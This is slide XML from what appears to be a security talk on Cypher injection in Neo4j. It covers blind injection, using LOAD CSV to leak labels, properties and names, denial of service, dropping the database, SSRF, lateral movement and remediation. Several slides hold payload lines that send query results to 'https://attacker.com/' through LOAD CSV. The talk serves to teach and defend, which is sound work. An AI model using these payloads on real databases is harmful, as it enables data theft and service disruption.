            <a:ext cx="2843599" cy="22073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6" name="Google Shape;346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0" name="Shape 3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" name="Google Shape;3471;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3592450" y="517600"/>
            <a:ext cx="4378200" cy="234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2" name="Google Shape;3472;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681100" y="439075"/>
            <a:ext cx="6462900" cy="210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Blind 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Injection</a:t>
            </a:r>
            <a:endParaRPr sz="7200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3473" name="Google Shape;3473;p56"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="16418" r="21485" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-270200" y="1621100"/>
            <a:ext cx="4143899" cy="35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4" name="Google Shape;3474;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402600" y="2585975"/>
            <a:ext cx="5741400" cy="14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LOAD CSV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600"/>
              <a:t>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Comes To The Rescue!</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3475" name="Google Shape;3475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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238500" y="117575"/>
            <a:ext cx="8793900" cy="9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Using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> LOAD CSV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600"/>
              <a:t> To Leak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Labels</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3481" name="Google Shape;3481;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312400" y="1393125"/>
            <a:ext cx="8004300" cy="195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57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="55350" y="1244000"/>
            <a:ext cx="9144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CALL</a:t>
            </a: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0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db.labels()</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="30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0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YIELD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0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label</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="30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3000">
              <a:solidFill>
                <a:srgbClr val="21212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LOAD CSV FROM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b="1" lang="en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https://attacker.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000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'+</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="07376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label</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="30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30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b//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3" name="Google Shape;3483;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="20483" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1109213"/>
            <a:ext cx="9144000" cy="32157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4" name="Google Shape;3484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58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="28450" y="41375"/>
            <a:ext cx="9144000" cy="9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Using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LOAD CSV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400"/>
              <a:t> To Leak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Properties</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3490" name="Google Shape;3490;p58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312400" y="1393125"/>
            <a:ext cx="8004300" cy="195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58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="88650" y="1257375"/>
            <a:ext cx="896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lang="en"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(c:Character)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sz="2400">
              <a:solidFill>
                <a:srgbClr val="21212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LOAD CSV FROM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b="1" lang="en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https://attacker.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400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'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+apoc.text.join(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="24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keys(c),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' ')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b//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2" name="Google Shape;3492;p58"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="5589" l="0" r="10586" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="938826"/>
            <a:ext cx="9144001" cy="36195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3" name="Google Shape;349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7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8" name="Google Shape;3498;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="88650" y="117575"/>
            <a:ext cx="8844000" cy="95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Using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LOAD CSV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400"/>
              <a:t> To Leak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Names</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3499" name="Google Shape;3499;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312400" y="1393125"/>
            <a:ext cx="8004300" cy="195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59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="88650" y="1071563"/>
            <a:ext cx="896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lang="en"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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"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r>
              <a:rPr lang="en"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:Character)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</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="21212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LOAD CSV FROM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b="1" lang="en" sz="24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https://attacker.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400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'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" sz="24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.name</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="24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b//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1" name="Google Shape;350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25" y="2559950"/>
            <a:ext cx="4979949" cy="25092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2" name="Google Shape;350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650" y="2559954"/>
            <a:ext cx="3872039" cy="250927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3" name="Google Shape;3503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33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719150" y="1061400"/>
            <a:ext cx="6433800" cy="319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33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-689525" y="2680500"/>
            <a:ext cx="3224700" cy="11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148" name="Google Shape;3148;p33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000"/>
              <a:t>Takeaways</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3149" name="Google Shape;3149;p33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="719150" y="1243275"/>
            <a:ext cx="5961225" cy="509100"/>
            <a:chOff x="719150" y="1471875"/>
            <a:chExt cx="5961225" cy="509100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3150" name="Google Shape;3150;p33"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1182575" y="1471875"/>
              <a:ext cx="54978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Cypher &amp; Graph Databases</a:t>
              </a:r>
              <a:endPara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3151" name="Google Shape;3151;p33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="719150" y="1522200"/>
              <a:ext cx="407400" cy="407400"/>
              <a:chOff x="1586150" y="3265275"/>
              <a:chExt cx="407400" cy="407400"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3152" name="Google Shape;3152;p33"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1586150" y="3265275"/>
                <a:ext cx="407400" cy="40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53" name="Google Shape;3153;p33"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1687908" y="3367033"/>
                <a:ext cx="204000" cy="20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154" name="Google Shape;3154;p33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="719150" y="1852875"/>
            <a:ext cx="5961225" cy="509100"/>
            <a:chOff x="719150" y="1471875"/>
            <a:chExt cx="5961225" cy="509100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3155" name="Google Shape;3155;p33"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1182575" y="1471875"/>
              <a:ext cx="54978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Injection Time!</a:t>
              </a:r>
              <a:endPara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3156" name="Google Shape;3156;p33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="719150" y="1522200"/>
              <a:ext cx="407400" cy="407400"/>
              <a:chOff x="1586150" y="3265275"/>
              <a:chExt cx="407400" cy="407400"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3157" name="Google Shape;3157;p33"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1586150" y="3265275"/>
                <a:ext cx="407400" cy="40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58" name="Google Shape;3158;p33"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1687908" y="3367033"/>
                <a:ext cx="204000" cy="20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159" name="Google Shape;3159;p33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="719150" y="2462475"/>
            <a:ext cx="5961225" cy="509100"/>
            <a:chOff x="719150" y="1471875"/>
            <a:chExt cx="5961225" cy="509100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3160" name="Google Shape;3160;p33"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1182575" y="1471875"/>
              <a:ext cx="54978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Attack Escalation</a:t>
              </a:r>
              <a:endParaRPr sz="25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3161" name="Google Shape;3161;p33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="719150" y="1522200"/>
              <a:ext cx="407400" cy="407400"/>
              <a:chOff x="1586150" y="3265275"/>
              <a:chExt cx="407400" cy="407400"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3162" name="Google Shape;3162;p33"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1586150" y="3265275"/>
                <a:ext cx="407400" cy="40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63" name="Google Shape;3163;p33"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1687908" y="3367033"/>
                <a:ext cx="204000" cy="20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164" name="Google Shape;3164;p33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="719150" y="3072075"/>
            <a:ext cx="5961225" cy="509100"/>
            <a:chOff x="719150" y="1471875"/>
            <a:chExt cx="5961225" cy="509100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3165" name="Google Shape;3165;p33"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1182575" y="1471875"/>
              <a:ext cx="54978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Remediation &amp; Mitigation</a:t>
              </a:r>
              <a:endPara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3166" name="Google Shape;3166;p33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="719150" y="1522200"/>
              <a:ext cx="407400" cy="407400"/>
              <a:chOff x="1586150" y="3265275"/>
              <a:chExt cx="407400" cy="407400"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3167" name="Google Shape;3167;p33"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1586150" y="3265275"/>
                <a:ext cx="407400" cy="40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68" name="Google Shape;3168;p33"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1687908" y="3367033"/>
                <a:ext cx="204000" cy="20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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3169" name="Google Shape;3169;p33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="719150" y="3681675"/>
            <a:ext cx="7341525" cy="509100"/>
            <a:chOff x="719150" y="1471875"/>
            <a:chExt cx="7341525" cy="509100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3170" name="Google Shape;3170;p33"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1182575" y="1471875"/>
              <a:ext cx="68781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500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What Now - A New Era of Injections</a:t>
              </a:r>
              <a:endPara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3171" name="Google Shape;3171;p33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="719150" y="1522200"/>
              <a:ext cx="407400" cy="407400"/>
              <a:chOff x="1586150" y="3265275"/>
              <a:chExt cx="407400" cy="407400"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3172" name="Google Shape;3172;p33"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1586150" y="3265275"/>
                <a:ext cx="407400" cy="40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  <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3173" name="Google Shape;3173;p33"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1687908" y="3367033"/>
                <a:ext cx="204000" cy="20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500"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3174" name="Google Shape;3174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8" name="Google Shape;3508;p60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="11112" l="0" r="4443" t="10956"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-476050" y="2187750"/>
            <a:ext cx="4742726" cy="29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p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3061075" y="1035675"/>
            <a:ext cx="6175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More </a:t>
            </a:r>
            <a:endParaRPr sz="6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Damage</a:t>
            </a:r>
            <a:endParaRPr sz="60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510" name="Google Shape;351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4" name="Shape 3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5" name="Google Shape;3515;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="15" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="3895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Attack Escalation</a:t>
            </a:r>
            <a:endParaRPr sz="3800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3516" name="Google Shape;3516;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466600" y="1501625"/>
            <a:ext cx="29694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Denial-Of-Service</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3517" name="Google Shape;3517;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466600" y="1848300"/>
            <a:ext cx="32211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Preventing access to the database</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3518" name="Google Shape;3518;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466600" y="11078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01</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3519" name="Google Shape;3519;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466600" y="3407625"/>
            <a:ext cx="3005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/>
              <a:t>Lateral Movement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520" name="Google Shape;3520;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466600" y="3754300"/>
            <a:ext cx="33804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Escalating to other machines</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3521" name="Google Shape;3521;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466600" y="30138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03</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3522" name="Google Shape;3522;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816300" y="1501625"/>
            <a:ext cx="27537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SSRF &amp; RFI</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3523" name="Google Shape;3523;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816300" y="1848300"/>
            <a:ext cx="30051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Accessing sensitive endpoints &amp; files</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3524" name="Google Shape;3524;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="8" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4819399" y="1107875"/>
            <a:ext cx="22035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02</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3525" name="Google Shape;3525;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8860925" y="1544075"/>
            <a:ext cx="36575" cy="73125"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2925" w="1463">
                <a:moveTo>
                  <a:pt x="1462" y="1"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1119" y="586"/>
                  <a:pt x="780" y="1217"/>
                  <a:pt x="437" y="1852"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="437" y="1899"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="2242"/>
                  <a:pt x="145" y="2581"/>
                  <a:pt x="1" y="2873"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="47" y="2873"/>
                  <a:pt x="98" y="2924"/>
                  <a:pt x="98" y="2924"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="535" y="1950"/>
                  <a:pt x="975" y="975"/>
                  <a:pt x="1462" y="1"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="00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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4847000" y="3407619"/>
            <a:ext cx="2480100" cy="4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Alternatives</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3527" name="Google Shape;3527;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4847000" y="3755225"/>
            <a:ext cx="3849600" cy="5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LOAD CSV alternatives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In Neo4J &amp; other databases</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3528" name="Google Shape;3528;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4819400" y="3013869"/>
            <a:ext cx="774900" cy="44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04</a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3529" name="Google Shape;352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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="465775"/>
            <a:ext cx="914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DoS - Leak &amp; Kill Connections</a:t>
            </a:r>
            <a:endParaRPr sz="3800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3535" name="Google Shape;3535;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="39265" l="0" r="63698" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="215175" y="1001325"/>
            <a:ext cx="8713625" cy="3200393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6" name="Google Shape;353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400" y="1176038"/>
            <a:ext cx="7486650" cy="85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7" name="Google Shape;353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550" y="1252675"/>
            <a:ext cx="8876500" cy="632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8" name="Google Shape;353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2" name="Shape 3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" name="Google Shape;3543;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="3895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Drop Database</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3544" name="Google Shape;3544;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="42993" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1766175" y="1023775"/>
            <a:ext cx="5343001" cy="38769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5" name="Google Shape;354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656" y="1621985"/>
            <a:ext cx="7972675" cy="203458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6" name="Google Shape;354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0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p64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="29175" y="897850"/>
            <a:ext cx="6020400" cy="16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More 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Damage</a:t>
            </a:r>
            <a:endParaRPr sz="7200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3552" name="Google Shape;35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525" y="1477825"/>
            <a:ext cx="3701700" cy="33780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3" name="Google Shape;3553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8" name="Google Shape;3558;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="36000"/>
          </a:blip>
          <a:srcRect b="25098" l="45929" r="1380" t="2259"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6760100" y="1463828"/>
            <a:ext cx="2176500" cy="254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9" name="Google Shape;355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25" y="1974452"/>
            <a:ext cx="1629000" cy="111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60" name="Google Shape;3560;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
